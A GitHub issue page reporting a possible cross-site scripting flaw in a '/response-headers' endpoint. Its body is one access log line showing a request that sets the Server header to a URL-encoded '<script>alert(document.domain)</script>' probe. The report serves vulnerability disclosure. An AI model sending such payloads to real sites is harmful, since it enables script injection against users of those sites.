Skip to content

GET /response-headers server Parameter XSS #78

New issue
New issue
Open
Open
GET /response-headers server Parameter XSS#78
Labels
Need More InfoFurther information is requested
@attritionorg

Description

@attritionorg
attritionorg
opened on Jan 29, 2026

server.bmw.yow.mybluehostin.me (162.240.233.90) - - [17/Nov/2025:13:28:22 -0700] "GET /response-headers?Content-Type=text/html&Server=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 308 417 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"

Metadata

Metadata

Assignees

No one assigned

    Labels

    Need More InfoFurther information is requested

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions